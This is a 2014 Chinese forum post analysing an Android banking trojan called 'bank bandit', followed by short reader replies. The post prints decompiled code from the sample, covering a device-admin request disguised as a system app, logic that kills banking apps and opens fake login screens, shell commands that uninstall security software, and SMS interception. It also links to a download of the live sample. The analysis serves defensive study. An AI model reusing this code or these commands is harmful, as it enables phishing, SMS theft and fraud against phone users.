【原创】对android病毒“银行悍匪”分析

kangkai · 发表于 2014-2-22 17:10

本帖最后由 kangkai 于 2014-3-2 21:24 编辑

一、 病毒样本基本信息

FileName: b5910a432d2b866e1028f31874edb32f .apk

File MD5: b5910a432d2b866e1028f31874edb32f

SHA1:0CEEB0A29AC4B24E1EFDD0F57ACFC64388CF5AC1

File Size: 829006 Byte

Package：langthing.nend

Download：http://yunpan.cn/Q4qHuRLaNivtd 访问密码 3a90 解压密码：52pojie

// 该病毒首先伪装成系统程序防止卸载；然后试着去卸载安全软件；监测各种银行应用；对需要拦截短信的关键字进行了加密，增加了分析的难度；没有MAIN和LAUNCHER组件,安装后没有图标，防止用户察觉到安装了应用

二、 病毒代码分析

查看AndroidManifest.xml配置文件，可以发现赋予了病毒非常多的权限，且是高危的权限，例如发送短信、拨打电话、读取日志文件、重启应用程序等等，且没有MAIN和LAUNCHER组件

[AppleScript] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

<manifest android:versionCode="1" android:versionName="1.1" package="langthing.nend"
  xmlns:android="http://schemas.android.com/apk/res/android">
    <uses-permission android:name="android.permission.RECEIVE_SMS" />  //接收短信
    <uses-permission android:name="android.permission.SEND_SMS" />      //发送短信
    <uses-permission android:name="android.permission.READ_SMS" />     //读取短息
    <uses-permission android:name="android.permission.WRITE_SMS" />  //编辑短信
    <uses-permission android:name="android.permission.SEND_SMS" />
    <uses-permission android:name="android.permission.READ_CONTACTS" />    //读取通讯录
    <uses-permission android:name="android.permission.WRITE_SETTINGS" />   //读取系统设置的数据库权限
    <uses-permission android:name="android.permission.READ_LOGS" />           //读取日志文件
    <uses-permission android:name="android.permission.WRITE_CONTACTS" />//编辑通讯录联系人
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />//读取电话状态
    <uses-permission android:name="android.permission.CALL_PHONE" />         //拨打电话
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />//接收开机信息
    <uses-permission android:name="android.permission.GET_TASKS" />  //获取运行程序信息
<uses-permission android:name="android.permission.RESTART_PACKAGES" />//重启应用程序

查看AndroidManifest.xml配置文件，可以发现当手机接收到TReceiver、eviceAdminReceiver、Alarmreceiver等组件时就会启动程序

[AppleScript] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

receiver android:name=".TReceiver">
            <intent-filter android:priority="2147483647">
                <action android:name="android.intent.action.BOOT_COMPLETED" />
            </intent-filter>
        </receiver>
        <receiver android:label="@string/app_name" android:name=".deviceAdminReceiver" android:permission="android.permission.BIND_DEVICE_ADMIN">
            <meta-data android:name="android.app.device_admin" android:resource="@xml/device_admin" />
            <intent-filter>
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
            </intent-filter>
        </receiver>
        <receiver android:name=".Alarmreceiver">
            <intent-filter>
                <action android:name="arui.alarm.action" />
            </intent-filter>
        </receiver>
        <receiver android:name=".ShutdownReceiver">
            <intent-filter>
                <action android:name="android.intent.action.ACTION_SHUTDOWN" />
            </intent-filter>

恶意注入代码的代码树如下：

当程序安装后，会伪装成系统程序，防止卸载。如图：

防卸载.png

查看langthing.nend.main伪装成系统代码如下：

[Java] 纯文本查看 复制代码

1

2

3

4

5

6

7

private void b()
  {
    Intent localIntent = new Intent("android.app.action.ADD_DEVICE_ADMIN");
    localIntent.putExtra("android.app.extra.DEVICE_ADMIN", this.c);
    localIntent.putExtra("android.app.extra.ADD_EXPLANATION", "------ android ------");  //  伪装成系统应用
    startActivityForResult(localIntent, 1);
  }

当应用监测到银行客户端启动时，就会终止个银行进程，并为工商银行、淘宝等定制了高仿真“钓鱼界面”

[Java] 纯文本查看 复制代码

001

002

003

004

005

006

007

008

009

010

011

012

013

014

015

016

017

018

019

020

021

022

023

024

025

026

027

028

029

030

031

032

033

034

035

036

037

038

039

040

041

042

043

044

045

046

047

048

049

050

051

052

053

054

055

056

057

058

059

060

061

062

063

064

065

066

067

068

069

070

071

072

073

074

075

076

077

078

079

080

081

082

083

084

085

086

087

088

089

090

091

092

093

094

095

096

097

098

099

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

private void e()
  {
    ComponentName localComponentName = ((ActivityManager.RunningTaskInfo)p.getRunningTasks(1).get(0)).topActivity;
    ActivityManager localActivityManager = (ActivityManager)getSystemService("activity");
    String str = localComponentName.getClassName();
    if ((str.contains("gs.gs")) || (str.contains("js.js")) || (str.contains("jt.jt")) || (str.contains("tb.tb")) || (str.contains("dz.dz")))
    {
      if (a(getApplicationContext(), "com.icbc"))
        localActivityManager.restartPackage("com.icbc");
      if (a(getApplicationContext(), "com.chinamworld.main"))
        localActivityManager.restartPackage("com.chinamworld.main");
      if (a(getApplicationContext(), "com.bankcomm"))
        localActivityManager.restartPackage("com.bankcomm");
      if (a(getApplicationContext(), "com.taobao.taobao"))
        localActivityManager.restartPackage("com.taobao.taobao");
      if (a(getApplicationContext(), "com.android.bankabc"))
        localActivityManager.restartPackage("com.android.bankabc");
      if (a(getApplicationContext(), "cmb.pb"))
        localActivityManager.restartPackage("cmb.pb");
      if (a(getApplicationContext(), "com.rytong.bankgdb"))
        localActivityManager.restartPackage("com.rytong.bankgdb");
      if (a(getApplicationContext(), "com.cib.bankcib"))
        localActivityManager.restartPackage("com.cib.bankcib");
      if (a(getApplicationContext(), "com.rytong.bankps"))
        localActivityManager.restartPackage("com.rytong.bankps");
      if (a(getApplicationContext(), "cn.com.njcb.android.mobilebank"))
        localActivityManager.restartPackage("cn.com.njcb.android.mobilebank");
      if (a(getApplicationContext(), "com.ecitic.bank.mobile"))
        localActivityManager.restartPackage("com.ecitic.bank.mobile");
      if (a(getApplicationContext(), "com.cebbank.bankebb"))
        localActivityManager.restartPackage("com.cebbank.bankebb");
      if (a(getApplicationContext(), "cn.com.cmbc.mbank"))
        localActivityManager.restartPackage("cn.com.cmbc.mbank");
      if (a(getApplicationContext(), "cn.com.spdb.mobilebank.per"))
        localActivityManager.restartPackage("cn.com.spdb.mobilebank.per");
      if (a(getApplicationContext(), "com.pingan.pabank.activity"))
        localActivityManager.restartPackage("com.pingan.pabank.activity");
      if (a(getApplicationContext(), "com.gzrcb.mobilebank"))
        localActivityManager.restartPackage("com.gzrcb.mobilebank");
      if (a(getApplicationContext(), "cn.com.cqb.mobilebank.per"))
        localActivityManager.restartPackage("cn.com.cqb.mobilebank.per");
      if (a(getApplicationContext(), "com.chinamworld.bocmbci"))
        localActivityManager.restartPackage("com.chinamworld.bocmbci");
      if (a(getApplicationContext(), "com.rytong.app.bankhx"))
        localActivityManager.restartPackage("com.rytong.app.bankhx");
      if (a(getApplicationContext(), "com.csii.huzhou.mobilebank"))
        localActivityManager.restartPackage("com.csii.huzhou.mobilebank");
      if (a(getApplicationContext(), "cn.com.shbank.mper"))
        localActivityManager.restartPackage("cn.com.shbank.mper");
      if (a(getApplicationContext(), "com.rytong.bankqd"))
        localActivityManager.restartPackage("com.rytong.bankqd");
      if (a(getApplicationContext(), "com.tlbank"))
        localActivityManager.restartPackage("com.tlbank");
      if (a(getApplicationContext(), "com.sookin.scyh"))
        localActivityManager.restartPackage("com.sookin.scyh");
      if (a(getApplicationContext(), "cn.com.hzb.mobilebank.per"))
        localActivityManager.restartPackage("cn.com.hzb.mobilebank.per");
      if (a(getApplicationContext(), "com.chinamworld.klb"))
        localActivityManager.restartPackage("com.chinamworld.klb");
}
if (str.contains("icbc"))
    {
      Cursor localCursor27 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "gs" }, null, null, null);
      if ((localCursor27.moveToFirst()) && (localCursor27.getInt(localCursor27.getColumnIndex("jilu")) == 0))
      {
        localActivityManager.restartPackage("com.icbc");
        new Intent("android.intent.action.MAIN");
        Intent localIntent53 = new Intent("android.intent.action.MAIN");
        localIntent53.setFlags(268435456);
        localIntent53.addCategory("android.intent.category.HOME");
        startActivity(localIntent53);
        Intent localIntent54 = new Intent(getApplicationContext(), gs.class);
        localIntent54.setFlags(268435456);
        startActivity(localIntent54);
      }
    }
    if (str.contains("com.chinamworld.main"))
    {
      Cursor localCursor26 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "js" }, null, null, null);
      if ((localCursor26.moveToFirst()) && (localCursor26.getInt(localCursor26.getColumnIndex("jilu")) == 0))
      {
        localActivityManager.restartPackage("com.chinamworld.main");
        new Intent("android.intent.action.MAIN");
        Intent localIntent51 = new Intent("android.intent.action.MAIN");
        localIntent51.setFlags(268435456);
        localIntent51.addCategory("android.intent.category.HOME");
        startActivity(localIntent51);
        Intent localIntent52 = new Intent(getApplicationContext(), js.class);
        localIntent52.setFlags(268435456);
        startActivity(localIntent52);
      }
    }
    if (str.contains("bankcomm"))
    {
      Cursor localCursor25 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "jt" }, null, null, null);
      if ((localCursor25.moveToFirst()) && (localCursor25.getInt(localCursor25.getColumnIndex("jilu")) == 0))
      {
        localActivityManager.restartPackage("com.bankcomm");
        new Intent("android.intent.action.MAIN");
        Intent localIntent49 = new Intent("android.intent.action.MAIN");
        localIntent49.setFlags(268435456);
        localIntent49.addCategory("android.intent.category.HOME");
        startActivity(localIntent49);
        Intent localIntent50 = new Intent(getApplicationContext(), jt.class);
        localIntent50.setFlags(268435456);
        startActivity(localIntent50);
      }
    }
    if (str.contains("taobao"))
    {
      Cursor localCursor24 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "tb" }, null, null, null);
      if ((localCursor24.moveToFirst()) && (localCursor24.getInt(localCursor24.getColumnIndex("jilu")) == 0))
      {
        localActivityManager.restartPackage("com.taobao.taobao");
        new Intent("android.intent.action.MAIN");
        Intent localIntent47 = new Intent("android.intent.action.MAIN");
        localIntent47.setFlags(268435456);
        localIntent47.addCategory("android.intent.category.HOME");
        startActivity(localIntent47);
        Intent localIntent48 = new Intent(getApplicationContext(), tb.class);
        localIntent48.setFlags(268435456);
        startActivity(localIntent48);
      }
 
//  终止各银行进程

查找安全软件并卸载安全软件

[Java] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

for (g = "Already root"; ; g = "NOroot")
   {
     this.C = 5;
     this.E = 5;
     this.B = new String[this.C];
     this.D = new String[this.E];
     this.B[0] = "pm uninstall com.qihoo360.mobilesafe";     //卸载360、腾讯、金山等相关的安全软件
     this.B[1] = "pm uninstall com.tencent.qqpimsecure"; 
     this.B[2] = "pm uninstall com.ijinshan.mguard";       
     this.B[3] = "pm uninstall com.ijinshan.duba";           
     this.B[4] = "pm uninstall com.anguanjia.safe";
     this.D[0] = "com.qihoo360.mobilesafe";
     this.D[1] = "com.tencent.qqpimsecure";
     this.D[2] = "com.ijinshan.mguard";
     this.D[3] = "com.ijinshan.duba";
     this.D[4] = "com.anguanjia.safe";
     this.s = new o();

拦截相关短信：

[Java] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

f (i5 == 1)
          if ((server.f == 0) && (server.a != i3))
          {
            server.a(this.a, 1);
            server.b(this.a, i3);
            str4 = "接收";
            server.a(this.a, new o());
            String str5 = server.d(this.a).a(this.a.getApplicationContext());
            server.a(this.a, new n());
            server.g(this.a).a(this.a.getApplicationContext(), str2, str1, str5);
            localStringBuilder.append("[ ");
            localStringBuilder.append(str1 + ", ");
            localStringBuilder.append(i4 + ", ");
            localStringBuilder.append(str2 + ", ");
            localStringBuilder.append(str3 + ", ");
            localStringBuilder.append(str4);
            localStringBuilder.append(" ]\n\n");
            if (!localCursor1.isClosed())
              localCursor1.close();
          }
      }
      while (true)
      {
        localStringBuilder.append("getSmsInPhone has executed!");
        super.onChange(paramBoolean);
        return;
        server.f = 0;
        break;
        if (i5 != 2)
          break;
        if (server.b == i3)
          break label760;
        Cursor localCursor2 = server.c.a("send", null, null, null, null, null, "_id ASC");
        if (localCursor2.moveToFirst())
        {
          localCursor2.getColumnIndex("_id");
          int i6 = localCursor2.getColumnIndex("sSend");
          do
            server.a(this.a, localCursor2.getString(i6));
          while (localCursor2.moveToNext());
        }
        localCursor2.close();
        if (server.h(this.a).equals("1"))
        {
          server.a(this.a, new o());
          server.a(this.a, new n());
          String str6 = server.d(this.a).a(this.a.getApplicationContext());
          server.a(this.a, str2 + ";" + str1, str6);
        }
        server.b = i3;
        str4 = "发送";
        break;
        localStringBuilder.append("no result!");
      }
    }
    catch (SQLiteException localSQLiteException)
    {
      while (true)
      {
        continue;
        label760: String str4 = "null";
      }
    }
  }
}

解密密钥：

[Java] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

public void a()
  {
    try
    {
      InputStream localInputStream = getAssets().open("unhi.db");     // 密钥
      FileOutputStream localFileOutputStream = new FileOutputStream(this.q + "unhi.db");
      byte[] arrayOfByte = new byte[1024];
      while (true)
      {
        int i1 = localInputStream.read(arrayOfByte);
        if (i1 <= 0)
        {
          localFileOutputStream.flush();
          localFileOutputStream.close();
          localInputStream.close();
          return;
        }
        localFileOutputStream.write(arrayOfByte, 0, i1);
      }
    }
    catch (Exception localException)
    {
    }
  }
 
  public void a(String paramString)
  {
    if (!new File(paramString).exists())
      a();
  }
 
  public void c()
  {
    new l(this).start();
  }
 
  public IBinder onBind(Intent paramIntent)
  {
    return null;
  }
 
  public void onCreate()
  {
    this.u = new e();
    IntentFilter localIntentFilter = new IntentFilter("android.provider.Telephony.SMS_RECEIVED");
    localIntentFilter.setPriority(2147483647);
    registerReceiver(this.u, localIntentFilter);
    p = (ActivityManager)getSystemService("activity");
    this.F = 0;
this.j = false;
 
 
b(this.s.a(getApplicationContext()), "201305:" + g + ";ver:" + Build.VERSION.RELEASE + ";Model:" + Build.MODEL);
      this.q = (getApplicationContext().getFilesDir().getAbsolutePath() + "/");
      a(this.q + "unhi.db");
      c = new a(this, getApplicationContext().getFilesDir().getAbsolutePath() + "/unhi.db", null, 1);
      m localm = new m(this, new Handler());
      getContentResolver().registerContentObserver(Uri.parse("content://sms/"), true, localm);
      Intent localIntent = new Intent(getApplicationContext(), log.class);
      localIntent.setFlags(268435456);
      startService(localIntent);

三、总结

该病毒尝试着去卸载安全软件；采用了加密技术，增加了分析难度；并隐藏运行界面，防止用户察觉。可以看出移动安全问题越演越烈，且手段越来越高明，增加了分析难度。

// 由于本人对于密码学方面还没有Hello World的水平，所以无法解密相关信息，水平有限。

小king · 发表于 2014-2-22 17:18

支持一下，手机上的360估计也就是个软件推广工具吧……
下东西尽量从Google Play上面下应该就能避免这些软件了吧

netstyle · 发表于 2014-3-14 21:07

这种病毒入侵方式比较强大不知道楼主是否了解一种安卓病毒会在用户启动银行等系统时后台启动截图程序（当然是隐藏的应用程序查看不到的），登陆银行输入密码的时候都会智能截图，然后可能会对截取得图片加密，然后上传到某服务器~ 是我脑补太严重了么？？

892644330 · 发表于 2014-2-22 17:21

安卓版的病毒越来越高级了？？？

blmk · 发表于 2014-2-22 17:24

好可怕的，病毒升级了！

2dehen · 发表于 2014-3-1 18:15

太强悍了吧，以后得小心着自己的手机网银了

社会太现实 · 发表于 2014-3-1 18:28

楼主强大！！！！

不二男人 · 发表于 2014-3-1 20:16

现在的病毒可以说越来越牛了啊，，受不了了手机都别用了

bin3008 · 发表于 2014-3-1 21:16

谢谢分享爱那个

小宇0721 · 发表于 2014-3-2 09:21

厉害。。

慢慢努力。。。

小黑and小白 · 发表于 2014-3-2 10:16

看來防不勝防啊。

帐号		自动登录	找回密码
密码			注册[Register]

[移动样本分析] 【原创】对android病毒“银行悍匪”分析

免费评分